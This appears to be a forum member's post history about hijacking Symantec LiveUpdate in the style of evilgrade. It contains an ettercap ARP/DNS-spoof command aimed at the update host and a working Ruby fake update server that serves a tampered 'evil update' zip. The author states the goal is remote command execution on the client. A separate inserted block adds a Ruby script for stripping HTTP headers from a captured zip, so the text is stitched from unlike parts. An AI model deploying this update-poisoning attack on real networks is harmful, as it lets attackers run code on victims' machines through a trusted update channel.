i8igmac
Dedicated Members
Posts: 939
Days Won: 22

Everything posted by i8igmac

  1. Here is a quick update on what I have done so far... I was going to make a video but I see no need... The client successfully downloads the modified zip file from my computer during the DNS spoof (screenshot of Wireshark). I just need to modify the zip package's contents to trigger execution...

    sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //

First thing is the ettercap filter drops encryption for more plaintext (not sure if it's needed for this situation but I like to use it).

    dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]

    sudo ruby exploit.rb

(It's something I put together in a few minutes, don't judge me ,-P)

    require 'socket'

    # Fake LiveUpdate server: answers the two GETs the client sends after the
    # DNS spoof and hands it the modified zip. Binding port 80 needs root (sudo).
    PAYLOAD = '/home/bigmac/out.zip' # new evil update

    # Read one full HTTP request (headers up to the blank line) rather than a
    # fixed 100 bytes, so the second request is not left half-read in the buffer.
    def read_request(client)
      req = +''
      while (line = client.gets)
        req << line
        break if line == "\r\n"
      end
      req
    end

    # Header lines must be separated by CRLF and the block ended by CRLF CRLF.
    def send_headers(client, lines)
      client.print(lines.join("\r\n") + "\r\n\r\n")
    end

    server = TCPServer.open(80)
    loop do
      client = server.accept
      print read_request(client) # should receive GET /minitri.flg
      send_headers(client, [
        'HTTP/1.1 200 OK',
        'Content-Length: 1',
        'Content-Type: text/plain',
        'Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT',
        'ETag: "1-42ea9080"',
        'Accept-Ranges: bytes',
        'Date: Sun, 15 May 2011 01:52:21 GMT',
        'Connection: keep-alive',
        'Cache-Control: public,must-revalidate,max-age=1800'
      ])
      # Content-Length is 1, so one byte of body must follow; the real content
      # of minitri.flg is not in the post, a newline is assumed here.
      client.print("\n")
      print read_request(client) # should receive GET /update symnetc from client
      # now send payload
      payload = File.binread(PAYLOAD)
      send_headers(client, [
        'HTTP/1.1 200 OK',
        'Content-Type: application/zip',
        "Content-Length: #{payload.bytesize}", # tells the client where the zip ends on a keep-alive connection
        'Last-Modified: Sun, 15 May 2011 21:16:04 GMT',
        'ETag: W/"15a1-4dd04294"',
        'Accept-Ranges: bytes',
        'Date: Sun, 15 May 2011 20:50:18 GMT',
        'Connection: keep-alive',
        'Cache-Control: public,must-revalidate,max-age=240'
      ])
      client.print(payload)
      # client.print "Closing the connection. Bye!"
      # client.close # Disconnect from the client
    end

Wireshark screenshot of the zip file downloaded, 192.168.1.102 <---> 192.168.1.104: img838.imageshack.us/i/screenshotwireshark.png ... I should post the zip file, I'm sure all that is needed is changing a few numbers around to trigger execution.
  2. ettercap, filter to drop encryption for more plain text... I fixed my problem with extracting the file ,-) Instead of pasting to a text editor I just use nc (netcat):

    nc xxx.xxx.xx 80 > out.zip

    GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1
    If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT
    Cache-control: max-age=0
    Cache-Control: no-cache
    Cache-Control: max-stale=0
    Cache-Control: min-fresh=1000
    Accept: */*
    HOST: liveupdate.symantecliveupdate.com
    User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE
    Connection: Keep-Alive

I open out.zip with a text editor and removed the response header field from the top of the file, and the file extracts just fine ,-) I would really like to share more in-depth because this looks promising... One of the files' contents looks like this, one line:

    MOVE([TempDir],%StreamDefDir%)

I think this could give me sort of remote command execution. A quick test would be 'ping 192.168.1.101' (my laptop IP). I found this log someone posted and now it gives me a better view of what's going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt
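The header-stripping step from the post above, as an added example that is not part of the original post or of any Symantec tooling: a small Ruby script that does what the author did by hand in a text editor. It assumes a capture taken with `nc host 80 > out.zip` that holds the entire HTTP response, splits the response at the first CRLF CRLF, honours Content-Length, checks that the body starts with a zip local file header, and walks the central directory to list the entries. The embedded sample capture is constructed (a one-entry stored zip built inline), not a LiveUpdate package, and all function names are this example's own. It also refuses the two captures that produce a file that will not extract: a 304 Not Modified answer (the captured request carries If-Modified-Since, so a replay may get no body) and a body cut short of Content-Length.

```ruby
require 'zlib'

ZIP_LOCAL_MAGIC   = "PK\x03\x04".b
ZIP_CENTRAL_MAGIC = "PK\x01\x02".b
ZIP_EOCD_MAGIC    = "PK\x05\x06".b

# Build a minimal stored (uncompressed) zip with one entry. Only used to
# fabricate the sample capture below; it is not a LiveUpdate package.
def build_stored_zip(name, data)
  name = name.b
  data = data.b
  crc = Zlib.crc32(data)
  local = [0x04034b50, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
           name.bytesize, 0].pack('VvvvvvVVVvv') + name + data
  central = [0x02014b50, 20, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
             name.bytesize, 0, 0, 0, 0, 0, 0].pack('VvvvvvvVVVvvvvvVV') + name
  eocd = [0x06054b50, 0, 0, 1, 1, central.bytesize, local.bytesize, 0].pack('VvvvvVVv')
  local + central + eocd
end

# Split a raw capture (HTTP response headers followed by the body, as saved by
# `nc host 80 > out.zip`) into status code, header hash and body bytes.
def split_http_response(raw)
  raw = raw.b
  sep = raw.index("\r\n\r\n")
  raise ArgumentError, 'no HTTP header terminator (CRLF CRLF) found' unless sep
  status_line, *header_lines = raw[0...sep].split("\r\n")
  status = status_line.to_s[%r{\AHTTP/\d\.\d (\d{3})}, 1].to_i
  headers = {}
  header_lines.each do |line|
    key, value = line.split(':', 2)
    headers[key.strip.downcase] = value.strip if value
  end
  [status, headers, raw[(sep + 4)..-1]]
end

# Return only the zip bytes, or raise if the capture cannot be a complete zip.
def extract_zip_body(raw)
  status, headers, body = split_http_response(raw)
  raise "server answered #{status}, no update body (If-Modified-Since hit?)" unless status == 200
  raise 'chunked transfer encoding: de-chunk the body first' if headers['transfer-encoding'].to_s.downcase == 'chunked'
  if (len = headers['content-length'])
    len = Integer(len)
    raise "truncated capture: #{body.bytesize} of #{len} body bytes" if body.bytesize < len
    body = body[0, len]
  end
  raise 'body does not start with a zip local file header' unless body.start_with?(ZIP_LOCAL_MAGIC)
  body
end

# List entry names by walking the central directory, which is what an
# unzipper reads first; leftover header bytes in front shift every offset.
def zip_entry_names(zip)
  eocd = zip.rindex(ZIP_EOCD_MAGIC)
  raise 'no end-of-central-directory record' unless eocd
  count, _cd_size, cd_offset = zip[eocd + 10, 10].unpack('vVV')
  pos = cd_offset
  Array.new(count) do
    raise 'bad central directory header' unless zip[pos, 4] == ZIP_CENTRAL_MAGIC
    nlen, xlen, clen = zip[pos + 28, 6].unpack('vvv')
    name = zip[pos + 46, nlen]
    pos += 46 + nlen + xlen + clen
    name
  end
end

# Constructed sample: what out.zip looks like before the headers are removed.
SAMPLE_ZIP = build_stored_zip('example.txt', "constructed sample entry\n")
SAMPLE_CAPTURE = ("HTTP/1.1 200 OK\r\nContent-Type: application/zip\r\n" \
                  "Content-Length: #{SAMPLE_ZIP.bytesize}\r\nConnection: keep-alive\r\n\r\n").b + SAMPLE_ZIP

if $PROGRAM_NAME == __FILE__
  raw = ARGV[0] ? File.binread(ARGV[0]) : SAMPLE_CAPTURE
  zip = extract_zip_body(raw)
  File.binwrite('out.zip', zip) if ARGV[0]
  puts "zip body: #{zip.bytesize} bytes, entries: #{zip_entry_names(zip).join(', ')}"
end
```

Run it as `ruby strip_headers.rb capture.bin` to overwrite out.zip with the bare archive; without an argument it processes the constructed sample.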
  3. Maybe I could get someone's opinion. I have captured a GET request like /get symtec/id/dir/update.zip. I can reproduce this GET request with Ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents but it fails. I hope to write my own evilgrade-style exploit. Right now I'm on my Droid; I will post this GET request and the binary data tonight. Any thoughts on how to properly handle this zip file, please share.